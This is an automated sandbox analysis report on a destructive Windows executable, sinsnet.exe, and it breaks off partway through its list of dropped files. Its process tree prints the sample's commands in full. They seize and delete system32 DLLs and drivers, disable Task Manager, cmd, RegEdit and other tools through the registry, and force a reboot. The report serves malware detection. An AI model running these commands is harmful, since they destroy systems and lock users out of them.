aa4f0ac95d9dafa33ccd20a7d94d4387bf4ac89132077905480dfcadbef861e8

Analysis

max time kernel
147s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06/08/2024, 10:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sinsnet.exe
Size

1.2MB
MD5

10338fadd26a505ad3d819cf9be0eb73
SHA1

c640b428049812cdaf19aaede3816c3b79e38cfd
SHA256

aa4f0ac95d9dafa33ccd20a7d94d4387bf4ac89132077905480dfcadbef861e8
SHA512

c9d7deace95beb2b37631d2b618b1201fd61cac679f69ec1f119b0aa37578a7d57df36b4fa3d77b58a540f65e2b4b6d885e2e5903ca031339692dd32d795697c
SSDEEP

24576:dWqfJ7Z391iOmM6Hb3T67o6ffdlpMotQ3vKnTOhbjIlJmFbJojWBnkfdyLGpSik7:YKyWnktJ0s

Score

8^/10

discovery evasion exploit

Malware Config

Signatures

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Disables cmd.exe use via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	reg.exe

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
4280	takeown.exe
3384	takeown.exe
3672	icacls.exe
3224	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	sinsnet.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4280	takeown.exe
3384	takeown.exe
3672	icacls.exe
3224	icacls.exe

Drops file in Windows directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe

Modifies registry key 1 TTPs 6 IoCs

Modify Registry

T1112

pid	Process
3660	reg.exe
408	reg.exe
760	reg.exe
1796	reg.exe
2820	reg.exe
3432	reg.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
704	mspaint.exe
704	mspaint.exe
4796	mspaint.exe
4796	mspaint.exe
1648	mspaint.exe
1648	mspaint.exe
4476	mspaint.exe
4476	mspaint.exe
4604	mspaint.exe
4604	mspaint.exe
4252	mspaint.exe
4252	mspaint.exe
2036	mspaint.exe
2036	mspaint.exe
4696	mspaint.exe
4696	mspaint.exe
2216	mspaint.exe
2216	mspaint.exe
1300	mspaint.exe
1300	mspaint.exe
1932	mspaint.exe
1932	mspaint.exe
3256	mspaint.exe
3256	mspaint.exe
4844	mspaint.exe
4844	mspaint.exe
4644	mspaint.exe
4644	mspaint.exe
3636	mspaint.exe
3636	mspaint.exe
2372	mspaint.exe
2372	mspaint.exe
4184	mspaint.exe
4184	mspaint.exe
4968	mspaint.exe
4968	mspaint.exe
4992	mspaint.exe
4992	mspaint.exe
4352	mspaint.exe
4352	mspaint.exe
4612	mspaint.exe
4612	mspaint.exe
1352	mspaint.exe
1352	mspaint.exe
2164	mspaint.exe
2164	mspaint.exe
3936	mspaint.exe
3936	mspaint.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
752	sinsnet.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	4280	takeown.exe
Token: SeTakeOwnershipPrivilege	3384	takeown.exe
Token: SeShutdownPrivilege	3452	shutdown.exe
Token: SeRemoteShutdownPrivilege	3452	shutdown.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
704	mspaint.exe
704	mspaint.exe
704	mspaint.exe
704	mspaint.exe
4796	mspaint.exe
4796	mspaint.exe
4796	mspaint.exe
4796	mspaint.exe
1648	mspaint.exe
1648	mspaint.exe
1648	mspaint.exe
1648	mspaint.exe
4476	mspaint.exe
4476	mspaint.exe
4476	mspaint.exe
4476	mspaint.exe
4604	mspaint.exe
4604	mspaint.exe
4604	mspaint.exe
4604	mspaint.exe
4252	mspaint.exe
4252	mspaint.exe
4252	mspaint.exe
4252	mspaint.exe
2036	mspaint.exe
2036	mspaint.exe
2036	mspaint.exe
2036	mspaint.exe
4696	mspaint.exe
4696	mspaint.exe
4696	mspaint.exe
4696	mspaint.exe
2216	mspaint.exe
2216	mspaint.exe
2216	mspaint.exe
2216	mspaint.exe
1300	mspaint.exe
1300	mspaint.exe
1300	mspaint.exe
1300	mspaint.exe
1932	mspaint.exe
1932	mspaint.exe
1932	mspaint.exe
1932	mspaint.exe
3256	mspaint.exe
3256	mspaint.exe
3256	mspaint.exe
3256	mspaint.exe
4844	mspaint.exe
4844	mspaint.exe
4844	mspaint.exe
4844	mspaint.exe
4644	mspaint.exe
4644	mspaint.exe
4644	mspaint.exe
4644	mspaint.exe
3636	mspaint.exe
3636	mspaint.exe
3636	mspaint.exe
3636	mspaint.exe
2372	mspaint.exe
2372	mspaint.exe
2372	mspaint.exe
2372	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 752 wrote to memory of 3668	752	sinsnet.exe	87
PID 752 wrote to memory of 3668	752	sinsnet.exe	87
PID 752 wrote to memory of 452	752	sinsnet.exe	89
PID 752 wrote to memory of 452	752	sinsnet.exe	89
PID 752 wrote to memory of 408	752	sinsnet.exe	91
PID 752 wrote to memory of 408	752	sinsnet.exe	91
PID 752 wrote to memory of 760	752	sinsnet.exe	93
PID 752 wrote to memory of 760	752	sinsnet.exe	93
PID 752 wrote to memory of 1796	752	sinsnet.exe	95
PID 752 wrote to memory of 1796	752	sinsnet.exe	95
PID 752 wrote to memory of 2820	752	sinsnet.exe	97
PID 752 wrote to memory of 2820	752	sinsnet.exe	97
PID 752 wrote to memory of 3432	752	sinsnet.exe	99
PID 752 wrote to memory of 3432	752	sinsnet.exe	99
PID 752 wrote to memory of 3660	752	sinsnet.exe	101
PID 752 wrote to memory of 3660	752	sinsnet.exe	101
PID 3668 wrote to memory of 4280	3668	cmd.exe	103
PID 3668 wrote to memory of 4280	3668	cmd.exe	103
PID 752 wrote to memory of 704	752	sinsnet.exe	104
PID 752 wrote to memory of 704	752	sinsnet.exe	104
PID 452 wrote to memory of 3384	452	cmd.exe	105
PID 452 wrote to memory of 3384	452	cmd.exe	105
PID 752 wrote to memory of 4532	752	sinsnet.exe	109
PID 752 wrote to memory of 4532	752	sinsnet.exe	109
PID 452 wrote to memory of 3672	452	cmd.exe	110
PID 452 wrote to memory of 3672	452	cmd.exe	110
PID 752 wrote to memory of 4796	752	sinsnet.exe	111
PID 752 wrote to memory of 4796	752	sinsnet.exe	111
PID 752 wrote to memory of 2868	752	sinsnet.exe	112
PID 752 wrote to memory of 2868	752	sinsnet.exe	112
PID 752 wrote to memory of 4084	752	sinsnet.exe	113
PID 752 wrote to memory of 4084	752	sinsnet.exe	113
PID 752 wrote to memory of 1648	752	sinsnet.exe	114
PID 752 wrote to memory of 1648	752	sinsnet.exe	114
PID 752 wrote to memory of 4476	752	sinsnet.exe	116
PID 752 wrote to memory of 4476	752	sinsnet.exe	116
PID 752 wrote to memory of 4604	752	sinsnet.exe	117
PID 752 wrote to memory of 4604	752	sinsnet.exe	117
PID 752 wrote to memory of 4252	752	sinsnet.exe	118
PID 752 wrote to memory of 4252	752	sinsnet.exe	118
PID 752 wrote to memory of 2036	752	sinsnet.exe	121
PID 752 wrote to memory of 2036	752	sinsnet.exe	121
PID 752 wrote to memory of 4696	752	sinsnet.exe	122
PID 752 wrote to memory of 4696	752	sinsnet.exe	122
PID 3668 wrote to memory of 3224	3668	cmd.exe	123
PID 3668 wrote to memory of 3224	3668	cmd.exe	123
PID 752 wrote to memory of 5040	752	sinsnet.exe	124
PID 752 wrote to memory of 5040	752	sinsnet.exe	124
PID 752 wrote to memory of 2120	752	sinsnet.exe	125
PID 752 wrote to memory of 2120	752	sinsnet.exe	125
PID 752 wrote to memory of 2216	752	sinsnet.exe	126
PID 752 wrote to memory of 2216	752	sinsnet.exe	126
PID 752 wrote to memory of 3720	752	sinsnet.exe	127
PID 752 wrote to memory of 3720	752	sinsnet.exe	127
PID 752 wrote to memory of 1300	752	sinsnet.exe	129
PID 752 wrote to memory of 1300	752	sinsnet.exe	129
PID 752 wrote to memory of 1932	752	sinsnet.exe	130
PID 752 wrote to memory of 1932	752	sinsnet.exe	130
PID 752 wrote to memory of 3256	752	sinsnet.exe	131
PID 752 wrote to memory of 3256	752	sinsnet.exe	131
PID 752 wrote to memory of 4844	752	sinsnet.exe	132
PID 752 wrote to memory of 4844	752	sinsnet.exe	132
PID 752 wrote to memory of 4644	752	sinsnet.exe	133
PID 752 wrote to memory of 4644	752	sinsnet.exe	133

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe
"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\system32\takeown.exe
    takeown /f c:\windows\system32\*.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4280
- - C:\Windows\system32\icacls.exe
    icacls c:\windows\system32\*.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\drivers\* && icacls c:\windows\system32\drivers\* /grant Everyone:(F) && del /s /q c:\windows\system32\drivers\* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:452
- - C:\Windows\system32\takeown.exe
    takeown /f c:\windows\system32\drivers\*
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3384
- - C:\Windows\system32\icacls.exe
    icacls c:\windows\system32\drivers\* /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3672
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:408
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
  2⤵
  - Disables cmd.exe use via registry modification
  - Modifies registry key
  PID:760
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:1796
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:2820
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:3432
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  - Disables RegEdit via registry modification
  - Modifies registry key
  PID:3660
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:704
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:4532
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4796
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:2868
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:4084
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1648
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4476
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4604
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4252
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2036
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4696
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:5040
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:2120
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2216
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:3720
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1300
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1932
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3256
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4844
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4644
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3636
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:3672
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2372
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:4184
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:4968
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:4992
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:4344
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:4352
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:4612
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1352
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:1464
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:552
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:3668
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:2624
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:3748
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:2104
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:2892
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:4436
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:376
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2164
- C:\Windows\System32\mspaint.exe
  "C:\Windows\System32\mspaint.exe"
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3936
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:3248
- C:\Windows\System32\notepad.exe
  "C:\Windows\System32\notepad.exe" note.txt
  2⤵
  PID:4328
- C:\Windows\System32\shutdown.exe
  "C:\Windows\System32\shutdown.exe" -r -t 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4468

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3962855 /state1:0x41c64e6d
1⤵
PID:4176

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies registry class
PID:364

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
PID:3544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\note.txt

Filesize
156B

MD5
78551eabd7131c45b744a0cf420d29f7

SHA1
0f6792d1f3339ab5ac7674ad46267049ec9eb2b7

SHA256
9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8

SHA512
abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
10KB

MD5
b0271d82494957ce37d0fc4f187429e2

SHA1
93b7e78748e6c1a63e380c1863cb0ca93e3da6fe

SHA256
5e06adb2c4b3f44f01d03b610dd6d8333c4bddb6fa3fbc6402491be4542570d4

SHA512
2de1f8726faef6cd44ae49bff14c303aa2a44eb50baa066ed146ffd17fc4539a4922afd9f7137a6cecbc54df2d23876ed3ed7d8a93d16ee92de6e4ab2036273f

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
12KB

MD5
4004876cc8c2ff36099dd41d8bf77688

SHA1
7af2e2c7ae5d862bfafa69a5a8472270c5b560aa

SHA256
d72856484a068dfc0f84dfcc6d13cd8bff1000d13f0e4820e12355d1a06b9bd9

SHA512
b630e8c138245c9b45d6deba2d5c0ea24e3d56447bcdcdf72dd944c67e40fad4ecbafa476b35dfc160be208a20f5665d3b7013f03fc49c437712f63e4f46f11a

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
13KB

MD5
f3b509fd0798c68704a34c671faa5a90

SHA1
85a7b9398ab0d72960685c0b60156bfd58f81460

SHA256
4d546b4e913e840ebabf2a7d3aef76d4fd1c8b6de0611508b3893051f207ccad

SHA512
3446c1ce350440dbf206e28c9c80eeccc8e5893e2d406a9eb72081abe4ce10678de3371a43642d7d3a8300a1dabf3c3e8ef9d25c5cbe04100b815625182147ce

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
15KB

MD5
950fc032f53f96bd7b0fbb79088737bf

SHA1
3941ca2053d2621c4a55b773a1b06ddcbe901414

SHA256
adcac89a0f23a9189e84e17325e8352873d94ee2def6bb6d362041bce7f25d01

SHA512
c22c20f683569be6bee05da0430862756e22dc91c2f8c5990530e8a40290ba3599f74322fd080f3b9999f6b740e4c0f48bcd084ccf10569c4a1ba3f7f90f834a

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
16KB

MD5
9bc71bca9461726c2df8cb353c23e1bc

SHA1
fec41e7a1995e329cb2b73b12fe06e61c5f1a62d

SHA256
d99d4e38a005e9f04764eb7c2be8dde38ec02b097ea915854d4464ba9c56da97

SHA512
d4f2c6f94b716777516b8d7d0276ebab44e79967c49f743f30d60563143510d07e17f4780eb9382966714c09bc9c1b6fcdbc67024230cb3c43494acee0d8326a

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
19KB

MD5
c7e42af86120fa9c5be79994ddcf473e

SHA1
0b4915afe822002fae54e58d5c1b6616a67561f3

SHA256
bc1003f7d8a6cebe484ddeb4ba83b8d02e896c57bab407b1768591fe37c20778

SHA512
deaa04a4c3014ac53e85c450a5bd8655dde6fde52808c4254ec9911672676193b9bc7991bcbe3322803e025a87351b1e61eb7b821f36a4e49500ab296f652e87

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
21KB

MD5
d94229c1a91f58e57760be58392fdfd6

SHA1
3c160620e6a0e5bcd9dfa686c3a9db2198be38d8

SHA256
1dab27568241f5085021462fb32ad716986d6fc1a409d166bd50b35e82a265fd

SHA512
44dd8fd5eff9e24718135fa7ef9a6a1e0e0e98c531ce4ed499ef33be76c88c0105c67997cc21dcf800e91d63c76ce3c6def76e0beeed3dc0238f4bc4b2a987d9

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
24KB

MD5
05c75f1d2357213de807e8eea1f60c27

SHA1
8eb55f124f156d84c611b93d3326226a8d26fdcd

SHA256
681690dba33a7b4aba9cb26520944f86d9d5e640d73d5bceadc010febe57bcee

SHA512
2fe408d1111f301ba3f032df50e02f41bbf5c48621b548dde2b482bbf420735181365e36980bff79c41d144a027dff1252b41a239d5ce00c72bceebf2368a3c3

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
25KB

MD5
26d19e1a4351c7d8b713ee41ff7d4280

SHA1
6a8b6e2d5e10ca000282a81e9b392a62c7c76995

SHA256
648e8c8dd9e69d321989c585381ac20cef2216def100cb7ac37b2cdc5a999136

SHA512
3c2b3fe2c437d14faf5fdb67e73bb518d4937972c000ad8313f34e95caf69ef60734ad7c016241db17c93b5ef6e934520adf7264bc380db11be69de3ba9c3f1d

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
25KB

MD5
6913be96ba6e16dfcf8eb72070cd6d2a

SHA1
80b3c7feea127e8127b28ffac2c119514af12088

SHA256
898499365312356e8006f299e45ea1058a765eb7ed9067f3967fc603e171b59c

SHA512
e5f49b72d788a29dfaa452fa0c81102da0f759f7b609cc554c8d926ad400ee321678d2e55a6a100f964233099fc019276d85481133a9f7da5030742b6d2cfef3

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
27KB

MD5
75f9c0d5a51d7e1b591e8299481940f5

SHA1
c045f6ab5641c478eaa8a900f822573625cbcb02

SHA256
2464a178ba0141093fb1ad8e624e29e75b555c6890f48c4b27cef90fbb96b4b9

SHA512
5956a02bc425a95f379c811a097b0a3486fa2f6738bdfa1b15f13180eade4242a57ee06601307f8ee86e702a645af9353de74328f271b6d6a186a957103d349c

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
28KB

MD5
612ade3231a4763d00d2b677f5fc0e37

SHA1
884d40f290a6af52c7cb28d5130258ced94a6985

SHA256
47f781b7b63f4e4e581a168218ddb9f1e2126dba0ab5ffeafbf6edd8046cf7a5

SHA512
ffbd721362da06a64e9211aff5848cd90ea62f6ac982efde8b40921c6fbf1928d3dd256e05ddd7e23960a8f2fbde97d3eb018b2a860ea87baa508f4b29b31100

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
31KB

MD5
6f0a8c808512ccd81f2a1c14f4bbf6a8

SHA1
8026e744146937a548ca37476402409d20ad5163

SHA256
17f5d6ede9b296c59667074e5b610f7dc90fa54b65d3a1810b2e4be92dc6e5e6

SHA512
6431080c75e55b32581f71ecfac2b94e4c0a711a6f11899b51c83f721bae470ffd85079e438aa768ff632c7f64db6a299e9e8240f244a306323307f79bb85956

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
34KB

MD5
f0e637b6c23677cb6e6cc537332483c3

SHA1
92bd7970f2bc0690093a4fa2ea8f92a8c18c0905

SHA256
f6cd7624fda8b40eed431c7c81dad40a4ae4fb22bc920580d6b2a83fff1fb146

SHA512
fe98dca72e606987aa703ab3bea7018f4c52e22fe4524fe5fbee65c7c440bb3fa552649572a44e217aeeb3cb85619780ea4f7b18ed78b2308d7f647c70fa57dc

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
36KB

MD5
